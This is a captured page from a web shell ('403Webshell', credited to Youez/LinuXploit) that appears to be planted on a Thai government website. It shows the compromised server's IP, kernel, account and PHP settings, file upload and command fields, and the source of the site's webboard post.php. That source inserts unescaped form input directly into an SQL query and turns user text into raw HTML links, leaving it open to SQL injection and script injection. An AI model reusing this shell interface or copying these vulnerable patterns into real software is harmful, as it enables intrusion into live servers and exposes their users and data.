403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.22.217.190
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/webboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/webboard/post.php
<?php

$navig['webboard']="กระดานสนทนา";
$navig['postq']="ตั้งประเด็น";
navigator($navig);
echo "<br>";
bar_header("ตั้งประเด็น"); // Bar_Header
fieldset_top("กระดานสนทนา");
echo "<br>";

import_request_variables('pG', 'p_');
if($p_QTitle!="")									{	     $QTitle=trim($p_QTitle);					}
if($p_evar!="")										{	     $QNote=trim($p_evar);					}
if($p_QName!="")									{	     $QName=trim($p_QName);			}
if($p_QEmail!="")									{	     $QEmail=trim($p_QEmail);				}
if($p_from_pic!="")								{	    $from_pic=trim($p_from_pic);			}
if($p_id_post_web!="")						{	    $id_post_web=trim($p_id_post_web);			}


if(isset($p_from_pic)) $from_pic=trim($p_from_pic);
// is the one accessing this page logged in or not?

if (!isset($p_from_pic))
  $from_pic = "";
if ($_SESSION['try2login'] != md5($from_pic) || $QTitle == "" || $QName == "") {
//  if (session_is_registered('try2login')) {
//    session_unregister('try2login');
//  }
  if(isset($_SESSION['try2login'])){
    unset($_SESSION['try2login']);
  }
  echo"<center><br>ป้อนรหัสลับไม่ถูกต้องกรุณาป้อนใหม่อีกครั้ง<br>ก่อนป้อนใหม่ให้กดปุ่ม F5 เพื่อสร้างรหัสลับใหม่<br><br>";
  echo"<a href='javascript:history.back()'><font color='ff0000'>[ป้อนรหัสลับใหม่]</font></center></a><br>";
//  include('coremain/footer.php');
  exit;
}
//if (session_is_registered('try2login')) {
//	session_unregister('try2login');
if(isset($_SESSION['try2login'])){
  unset($_SESSION['try2login']);
  
  function thai_date(){
    $thaiday = array("อาทิตย์","จันทร์","อังคาร","พุธ","พฤหัสบดี","ศุกร์","เสาร์");
    $thaimonth = array("ม.ค.","ก.พ.","มี.ค.","เม.ย.","พ.ค.","มิ.ย.","ก.ค.","ส.ค.","ก.ย.","ต.ค.","พ.ย.","ธ.ค.");
    $Date =$thaiday[date("w")]." ".date("j")." ".$thaimonth[date("m")-1]." ";
    $Ythai= date("Y")+543;
    $Date .= $Ythai; 
     return $Date;
  }
?>

<table width='100%' border='0' cellspacing='1'  align='center' cellpadding='0'>
  <tr> 
    <td height="100" valign="top"> <div align='center'>
  <?php
	$IP = getenv("REMOTE_ADDR");
	$Member = 0;

	// ตรวจสอบว่า มีการป้อน url หรือ email มาหรือไม่ ถ้ามีให้ทำ link
	$QNote = eregi_replace("([[:alnum:]]+)://([^[:space:]]*)([[:alnum:]#?/&=])","<a href=\"\\1://\\2\\3\" target=\"\\2\\3\">\\1://\\2\\3</a>",$QNote);
	$QNote = eregi_replace("([[:alnum:]]+)@([^[:space:]]*)([[:alnum:]])","<a href=mailto:\\1@\\2\\3>\\1@\\2\\3</a>",$QNote); 

	// ให้ขึ้นบันทัดใหม่ กรณีที่มีการเคาะ Enter
	$QNote = eregi_replace(chr(13),"<br>",$QNote);


	// ปรับเวลาให้ตรงกับเวลาเมืองไทย กรณีที่ server อยู่ที่เมืองนอก
    global $Date;
    $mdate =  thai_date();
	// เขียนข้อมูลลง database
	$sqlmax1="select max(No+1) from cms_webboard_data";
	$resultmax1=mysql_query($sqlmax1);
	$datamax1=mysql_fetch_row($resultmax1);		if ($datamax1[0]=="")		{			$datamax1[0]="1";		}
	if($QTitle!="" and $QName!="" and $id_post_web=='2'){
		if($IP!="178.159.37.28" and $IP!="178.159.37.34") {
	 $sql = "insert into cms_webboard_data (No,Category,Question,Note,Name,Member,IP,Email,Date,Image) values ('$datamax1[0]','main','$QTitle','$QNote','$QName','$Member','$IP','$QEmail','$mdate','$PData')";
	}
	
	}

	if(mysql_query($sql)) {
?>
        <center>
          <table width=60% border=0 cellpadding=2 cellspacing=0>
            <tr>
              <td align=center>
                <font color=red class=Menu1><br><b>ได้รับข้อมูลแล้ว</b></font><br>
                <!--//echo "หากประเด็นของคุณไม่ขึ้นให้กดปุ่ม Refresh/Reload-->
              </td>
            </tr>
          </table>
          <br>
          <hr color=FF1493 width=600>
          <font class=Menu>
            [ <a href='index.php?mod=webboard&path=webboard'>แสดงประเด็น</a>  I  <a href='index.php?mod=postq&path=webboard'>ตั้งประเด็นใหม่</a> ] 
          <font>
        </center>
    <?php
    if($Member && $QPic_name) {
      unlink($QPic_name);
      }
	} else {
      echo "Error <br>";
	}
    ?>
    </td>
  </tr>
</table>

<?php
}

  fieldset_down();

?>

Youez - 2016 - github.com/yon3zu
LinuXploit